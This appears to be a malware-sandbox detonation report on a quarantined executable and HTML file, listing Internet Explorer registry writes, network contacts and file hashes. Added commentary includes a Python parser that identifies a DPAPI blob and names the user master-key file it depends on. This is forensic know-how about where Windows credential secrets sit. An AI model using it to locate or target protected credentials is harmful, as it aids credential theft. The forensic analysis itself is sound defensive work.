"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"

Network

N/A

Files

memory/2308-0-0x000000007412E000-0x000000007412F000-memory.dmp

memory/2308-1-0x0000000000230000-0x00000000003A0000-memory.dmp

memory/2308-3-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2308-4-0x000000007412E000-0x000000007412F000-memory.dmp

memory/2308-5-0x0000000074120000-0x000000007480E000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2025-02-26 23:27

Reported

2025-02-26 23:30

Platform

win7-20240903-en

Max time kernel

121s

Max time network

127s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
The process reading NLS\Language is the 32-bit iexplore.exe itself, and that key is read during ordinary locale initialisation, so on its own this is a generic rule match rather than evidence that the HTML file fingerprints the system language.

Modifies Internet Explorer settings

adware spyware
Every key in this table lives under the user's HKCU\Software\Microsoft\Internet Explorer hive (IntelliForms, Recovery, TabbedBrowsing, DOMStorage, WindowsSearch, Window_Placement) and is written by iexplore.exe itself; these are the browser's first-run and session-recovery housekeeping writes, so the adware/spyware tag here is a generic rule hit and says nothing about what I8L5Xon.html does.
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f025131ba688db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{46A1C821-F499-11EF-869D-46BBF83CD43C} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda00000000020000000000106600000001000020000000cefa62c8335a558080a6fd0982a941d7f1c005aef8791418c792a682ff6c6884000000000e80000000020000200000002b1e7bbe3e5baa2b4b451cb0050c86788db912c44a06550e62db50e858ba0b0120000000b6ec7b8e9858665f6f12bf0714231abc61e5f477e1d31a90f72ad07f8948a7744000000037577dd0e9a419bedbe25811b70e59c9ce1278b1e1a011925f334fdf91c11874d7660f99fdedcb5514d6bcb2d1f0dc2fa86d74fd3b635bcdc35e699eba6777e4 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774329" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
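The long DecayDateQueue value a few rows up is worth a second look: its first 20 bytes are a version DWORD of 1 followed by the GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb, the DPAPI provider GUID, which marks a CryptProtectData blob bound to the logged-on user's master key. Recognising these blobs matters in a stealer case because browser credentials and cookies are protected the same way. The Python below is an added example, not part of this report or of the sandbox's tooling: it identifies the blob, walks its header, and names the master-key file it depends on. The blob bytes and the Window_Placement negative case are copied from the table above; the master-key path assumes the standard per-user Protect directory and that the hive SID belongs to the Admin account seen in this detonation's paths. It does not decrypt anything, since that needs the master key and the user's credential.

```python
import struct
import uuid

# Every CryptProtectData blob starts with version 1 and this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_ID values seen in DPAPI blobs; anything else is reported as hex.
ALG_NAMES = {
    0x6603: "CALG_3DES", 0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192",
    0x6610: "CALG_AES_256", 0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256", 0x800E: "CALG_SHA_512",
}

# Copied from the registry table above: the DecayDateQueue value and, as a negative
# case, Window_Placement (a WINDOWPLACEMENT struct, not a DPAPI blob).
DECAY_DATE_QUEUE_HEX = (
    "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000004d1b1ca6f04c341a257f85594af0dda"
    "00000000020000000000106600000001000020000000"
    "cefa62c8335a558080a6fd0982a941d7f1c005aef8791418c792a682ff6c6884"
    "000000000e8000000002000020000000"
    "2b1e7bbe3e5baa2b4b451cb0050c86788db912c44a06550e62db50e858ba0b01"
    "20000000b6ec7b8e9858665f6f12bf0714231abc61e5f477e1d31a90f72ad07f8948a774"
    "4000000037577dd0e9a419bedbe25811b70e59c9ce1278b1e1a011925f334fdf91c11874"
    "d7660f99fdedcb5514d6bcb2d1f0dc2fa86d74fd3b635bcdc35e699eba6777e4"
)
WINDOW_PLACEMENT_HEX = (
    "2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000"
)


def looks_like_dpapi_blob(data: bytes) -> bool:
    """Cheap carve test: version DWORD 1 followed by the DPAPI provider GUID."""
    return (len(data) >= 20 and data[:4] == b"\x01\x00\x00\x00"
            and uuid.UUID(bytes_le=data[4:20]) == DPAPI_PROVIDER_GUID)


def parse_dpapi_blob(data: bytes) -> dict:
    """Walk the CryptProtectData output layout: little-endian DWORDs, GUIDs in
    registry byte order, and length-prefixed byte fields."""
    if not looks_like_dpapi_blob(data):
        raise ValueError("not a DPAPI blob: wrong version or provider GUID")
    off = 0

    def u32():
        nonlocal off
        (value,) = struct.unpack_from("<I", data, off)
        off += 4
        return value

    def guid():
        nonlocal off
        value = uuid.UUID(bytes_le=data[off:off + 16])
        off += 16
        return value

    def counted():
        nonlocal off
        length = u32()
        value = data[off:off + length]
        off += length
        return value

    blob = {"version": u32(), "provider_guid": guid(),
            "master_key_version": u32(), "master_key_guid": guid(), "flags": u32()}
    blob["description"] = counted().decode("utf-16-le").rstrip("\x00")
    alg = u32()
    blob["crypt_alg"], blob["crypt_alg_bits"] = ALG_NAMES.get(alg, hex(alg)), u32()
    blob["salt"] = counted()
    blob["strong"] = counted()          # legacy HMAC key field, empty on modern Windows
    alg = u32()
    blob["hash_alg"], blob["hash_alg_bits"] = ALG_NAMES.get(alg, hex(alg)), u32()
    blob["hmac_key"] = counted()
    blob["data"] = counted()            # ciphertext; only the master key can recover it
    blob["sign"] = counted()            # HMAC over the blob
    if off != len(data):
        raise ValueError(f"{len(data) - off} trailing bytes after signature")
    return blob


def master_key_file(blob: dict, sid: str, user: str = "Admin") -> str:
    """Per-user master key file this blob depends on (standard Protect directory;
    assumes the hive SID belongs to the named account)."""
    return rf"C:\Users\{user}\AppData\Roaming\Microsoft\Protect\{sid}\{blob['master_key_guid']}"


if __name__ == "__main__":
    blob = parse_dpapi_blob(bytes.fromhex(DECAY_DATE_QUEUE_HEX))
    for key, value in blob.items():
        print(f"{key:20} {value.hex() if isinstance(value, bytes) else value}")
    print(master_key_file(blob, "S-1-5-21-3063565911-2056067323-3330884624-1000"))
```

The master-key GUID is the useful output for an investigator: it says which file under the user's Protect directory (and therefore which account credential) any offline decryption of this hive's protected values would need, and the same check applied to a stealer's exfiltrated files tells you whether it shipped raw DPAPI blobs or already-decrypted secrets.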

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2532 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabBD19.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\CabBD9A.tmp

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarBDAE.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f49b173a1405b941881ad205f53ed2d6
SHA1 0054b36b4b9730c02e81c4b9a270f2a7b5278f00
SHA256 bc38b1a04a98eefd0e0ead6291089f20ec9ffcd865111183e51073312e902c11
SHA512 33ac0459fca33478ad0ae5e867736b434fa91dedca583447e9a1dd5b2d6c08a463e006cfc32ae45372198ee7676f4134968bbe74bf82056c943a892dea72edd2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b46d165831e4811a621fadeda185cc4c
SHA1 a9f22469cc5ce8efa0eb81361e05187900e73152
SHA256 936299aab0f6bc06a8bcb3d8fbc979cd0b1713a471f980e68150994d35a3c8e7
SHA512 0d052a25817acb397ad01fb18df63cb434b4c2cf2441b3fe08d78cffcd3e711384c8bd0205d771f5a6bb62dea3d68a9eced9f64a34cad67aeaaea6738e03e785

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 212a1d4c90712c523dafd3d0a70a47de
SHA1 dd97ed5b63095e60aa97ac8dd12cd1d21f5e7352
SHA256 5634cab29a1a557ce51fe313d9e6791a0a62a01a5384ec14a18df5acbbfebc21
SHA512 5ae5fe0086dfd54efe75db0f7da6a7146d920f026df90d061e015fa21392547fa017c419101162b85dbf19be9f621f17506a97e3628a5ec0c4a7bc3c6de340b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ea4fc6bd21fb32777a5937d795c8afec
SHA1 d974ce6b1111454161c83155f008d732d80d2e5d
SHA256 e270e512cae2d5aa6447d5feebe7e6535dfd9164028417d5cb7f2d83fc69cf22
SHA512 5832db80f36ee3fc52f7753dfbd677305252098f58746dfc06ab80c0c27e43755463c299887a8bf8e769ffac561ba23a5a9c81b83130e0dc4c763707cfc61120

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bb523a1b107bea7cb013b799f5c83189
SHA1 66d36d85f8423210370a21ab4aed83b0a8bcdf0f
SHA256 1af1fc622eca07fa2c55676fa78193d395557255a0891fc46cd041a9aeee4a57
SHA512 388b326b93538a4507aa524f7bcc10cd79dd48eb4a65e901df091b09ca5934f48ca5a229e567a711e863ddbad3d8cd06b5a766357e1c73f0ec68b82214f0b190

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 83452e00afc744da2acc9a60ae090588
SHA1 db2982f3de5a47ae6530b94196fa48e443965305
SHA256 4f528ff5b613c179c2faef963cd2da819d786600c256d90bc500eb88baf6d517
